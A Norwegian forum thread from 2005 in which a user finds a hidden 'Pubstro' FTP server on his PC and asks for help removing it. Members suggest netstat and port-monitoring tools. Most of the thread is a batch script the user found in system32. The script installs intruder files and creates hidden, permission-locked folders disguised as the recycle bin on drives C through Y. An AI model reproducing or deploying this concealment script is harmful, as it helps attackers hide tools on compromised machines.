er blitt hacket!

franksun · 14. februar 2005

Hei.

Jeg synes at det var mistenkelig mye trafikk på linja mi, så fant jeg ut at jeg lyttet på port 22... så kobla jeg til porten og det visste seg å være en ftp-server!:

220-.[34m_________________________________________________________

220-.[43m::::::::::::::::::::::::::::::::::: Pubstro - Loud and Proud:::::::::::

:::::::::::::::::::::

220-.[34m|»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

220-.[34m| You are Connecting From: 127.0.0.1

220-.[34m| Time/Date Logged in: 14:35:40 @ Monday 14 February, 2005

220-.[34m| Server Uptime: 0 d, 0 h, 32 m

220-.[34m| Amount of Logins Since Server Started: 0

220-.[34m| Amount of Logins in the last 24 hours: 1

220-.[34m| Users connected now: 1

220-.[34m|_________________________________________________________

220-.[43m::::::::::::::::::::::::::::::::::: Pubstro - Loud and Proud:::::::::::

:::::::::::::::::::::

220-.[34m|»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

220-.[34m| Total Kb downloaded: 0

220-.[34m| Total Kb uploaded: 0

220-.[34m| Amount of Files downloaded: 0

220-.[34m| Amount of Files uploaded: 0

220-.[34m| Average Speed: 0.000

220-.[34m| Current Speed: 0.000

220-.[34m|_________________________________________________________

220-.[43m::::::::::::::::::::::::::::::::::: Pubstro - Loud and Proud:::::::::::

:::::::::::::::::::::

220-.[34m»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

220

Jeg har prøvd å stoppe prosessen, men jeg finner den ikke, jeg er ganske sikker på at prosessen skjuler seg bak en standard en... jeg har også kjørt antivirus med nyeste oppdateringer og den fant to bakdørerer, jeg fjernet de, men programmet kjører fortsatt i bakgrunnen,.

hva i allverden kan jeg gjøre for å fikse dette uten å formateree?

Arcus · 14. februar 2005

Vet ikke om det hjelpe deg noe videre, men det er intressant lesning uansett : http://www.mynetwatchman.com/kb/security/A...s/WinForensics/

http://www.dslreports.com/forum/remark,9735376

La oss vite hvordan det går, og hvordan du løste det.

franksun · 14. februar 2005

jeg har dessverre prøvd det der, og den finner ikke programmet som lytter på porten,...

Legion · 14. februar 2005

bruk port explorer og se hvilken prosess som gjør hva og hvilke porter som eventuellt blir brukt.

http://www.diamondcs.com.au/portexplorer/

franksun · 14. februar 2005

har gjort det også, har prøvd å dreepe prosessen som viser seg i "ps" så får jeg at den ikke finnes, men den er jo der!

skille · 14. februar 2005

Du finner ikke noen ukjent service som går heller?

Start > kjør > services.msc

Se om du kan stoppe noe der..

-Trond

franksun · 14. februar 2005

nei, finner ikke noe.

Legion · 14. februar 2005

hvilke tiltak har du satt til verks?

rams de opp. blle de kjørt i same-mode?

kjørt tds-3?

http://tds.diamondcs.com.au/index.php?page=home

du får blokkere port 22/21 inntill videre

TCi · 14. februar 2005

Hva med brannmur?

*Magnus* · 14. februar 2005

så kobla jeg til porten og det visste seg å være en ftp-server

OT:

hvordan gjorde du det ? har kikket litt her å der om hvordan man gjør dette, men fant ikke noe...

Terrasque · 15. februar 2005

start -> kjør -> cmd -> netstat /boan

Fin den som lytter på port 22

Løve · 15. februar 2005

Um... port 22 er vel FTP? Hvis du er på nettet kan det være du ser filene til en FTP server som du surfer på da...

TCi · 15. februar 2005

FTP opererer på port 21 som standard.

franksun · 15. februar 2005

start -> kjør -> cmd -> netstat /boan

Fin den som lytter på port 22

både PID og prosessnavn vises ikke.

franksun · 15. februar 2005

hei, jeg fanr denne fila i system32:

move carun.ocx "%systemroot%\system32\carun.ocx"

move TskMan.exe "%systemroot%\system32\TskMan.exe"

move chkdrv.vxd "%systemroot%\system32\chkdrv.vxd"

move carun.dll "%systemroot%\system32\carun.dll"

:diskc

if not exist "c:\" (goto diskd)

if not exist "c:\RECYCLER" mkdir "c:\RECYCLER" | attrib "c:\RECYCLER" +s +h

if exist "c:\RECYCLER" mkdir "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

move logon.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"

move logoff.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"

move change.txt "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"

echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "c:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=C:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskd

if not exist "d:\" (goto diske)

if not exist "d:\RECYCLER" mkdir "d:\RECYCLER" | attrib "d:\RECYCLER" +s +h

if exist "d:\RECYCLER" mkdir "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

if not exist "c:\RECYCLER" move logon.txt "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"

if not exist "c:\RECYCLER" move logoff.txt "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"

if not exist "c:\RECYCLER" move change.txt "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"

echo y|caclsENG "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=D:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diske

if not exist "e:\" (goto diskf)

if not exist "e:\RECYCLER" mkdir "e:\RECYCLER" | attrib "e:\RECYCLER" +s +h

if exist "e:\RECYCLER" mkdir "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp"

echo [.ShellClassInfo]>e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" move logon.txt "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"

if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" move logoff.txt "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"

if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" move change.txt "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"

echo y|caclsENG "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "e:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=E:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskf

if not exist "f:\" (goto diskg)

if not exist "f:\RECYCLER" mkdir "f:\RECYCLER" | attrib "f:\RECYCLER" +s +h

if exist "f:\RECYCLER" mkdir "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" if not exist "e:\RECYCLER" move logon.txt "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logonoop.txt"

if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" if not exist "e:\RECYCLER" move logoff.txt "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\logoffoop.txt"

if not exist "c:\RECYCLER" if not exist "d:\RECYCLER" if not exist "e:\RECYCLER" move change.txt "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\changeoop.txt"

echo y|caclsENG "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "f:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=F:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskg

if not exist "g:\" (goto diskh)

if not exist "g:\RECYCLER" mkdir "g:\RECYCLER" | attrib "g:\RECYCLER" +s +h

if exist "g:\RECYCLER" mkdir "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "g:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=G:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskh

if not exist "h:\" (goto diski)

if not exist "h:\RECYCLER" mkdir "h:\RECYCLER" | attrib "h:\RECYCLER" +s +h

if exist "h:\RECYCLER" mkdir "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "h:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=H:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diski

if not exist "i:\" (goto diskj)

if not exist "i:\RECYCLER" mkdir "i:\RECYCLER" | attrib "i:\RECYCLER" +s +h

if exist "i:\RECYCLER" mkdir "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "i:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=I:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskj

if not exist "j:\" (goto diskk)

if not exist "j:\RECYCLER" mkdir "j:\RECYCLER" | attrib "j:\RECYCLER" +s +h

if exist "j:\RECYCLER" mkdir "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "j:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=J:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskk

if not exist "k:\" (goto diskl)

if not exist "k:\RECYCLER" mkdir "k:\RECYCLER" | attrib "k:\RECYCLER" +s +h

if exist "k:\RECYCLER" mkdir "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "k:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=K:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskl

if not exist "l:\" (goto diskm)

if not exist "l:\RECYCLER" mkdir "l:\RECYCLER" | attrib "l:\RECYCLER" +s +h

if exist "l:\RECYCLER" mkdir "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "l:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=L:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskm

if not exist "m:\" (goto diskn)

if not exist "m:\RECYCLER" mkdir "m:\RECYCLER" | attrib "m:\RECYCLER" +s +h

if exist "m:\RECYCLER" mkdir "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "m:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=M:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskn

if not exist "n:\" (goto disko)

if not exist "n:\RECYCLER" mkdir "n:\RECYCLER" | attrib "n:\RECYCLER" +s +h

if exist "n:\RECYCLER" mkdir "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "n:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=N:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:disko

if not exist "o:\" (goto diskp)

if not exist "o:\RECYCLER" mkdir "o:\RECYCLER" | attrib "o:\RECYCLER" +s +h

if exist "o:\RECYCLER" mkdir "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "o:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=O:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskp

if not exist "p:\" (goto diskq)

if not exist "p:\RECYCLER" mkdir "p:\RECYCLER" | attrib "p:\RECYCLER" +s +h

if exist "p:\RECYCLER" mkdir "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "p:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=P:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskq

if not exist "q:\" (goto diskr)

if not exist "q:\RECYCLER" mkdir "q:\RECYCLER" | attrib "q:\RECYCLER" +s +h

if exist "q:\RECYCLER" mkdir "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=Q:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskr

if not exist "r:\" (goto disks)

if not exist "r:\RECYCLER" mkdir "r:\RECYCLER" | attrib "r:\RECYCLER" +s +h

if exist "r:\RECYCLER" mkdir "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "r:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=R:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:disks

if not exist "s:\" (goto diskt)

if not exist "s:\RECYCLER" mkdir "s:\RECYCLER" | attrib "s:\RECYCLER" +s +h

if exist "s:\RECYCLER" mkdir "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "s:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=S:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskt

if not exist "t:\" (goto disku)

if not exist "t:\RECYCLER" mkdir "t:\RECYCLER" | attrib "t:\RECYCLER" +s +h

if exist "t:\RECYCLER" mkdir "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "t:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=T:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:disku

if not exist "u:\" (goto diskv)

if not exist "u:\RECYCLER" mkdir "u:\RECYCLER" | attrib "u:\RECYCLER" +s +h

if exist "u:\RECYCLER" mkdir "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "u:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=U:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskv

if not exist "v:\" (goto diskw)

if not exist "v:\RECYCLER" mkdir "v:\RECYCLER" | attrib "v:\RECYCLER" +s +h

if exist "v:\RECYCLER" mkdir "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "v:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=V:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskw

if not exist "w:\" (goto diskx)

if not exist "w:\RECYCLER" mkdir "w:\RECYCLER" | attrib "w:\RECYCLER" +s +h

if exist "w:\RECYCLER" mkdir "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "w:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=W:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:diskx

if not exist "x:\" (goto disky)

if not exist "x:\RECYCLER" mkdir "x:\RECYCLER" | attrib "x:\RECYCLER" +s +h

if exist "x:\RECYCLER" mkdir "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

attrib "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" +s +h | attrib "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini" +h +s

echo y|caclsENG "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500" /T /G system:f Administrators:R

echo y|caclsENG "x:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp" /T /G system:f

echo checkpath=X:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools\>>"%systemroot%\system32\carun.ocx"

:disky

if not exist "y:\" (goto diskz)

if not exist "y:\RECYCLER" mkdir "y:\RECYCLER" | attrib "y:\RECYCLER" +s +h

if exist "y:\RECYCLER" mkdir "y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\temp\tools"

echo [.ShellClassInfo]>d:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini | echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>y:\RECYCLER\S-1-5-21-1960408961-1563985344-1708537768-500\desktop.ini

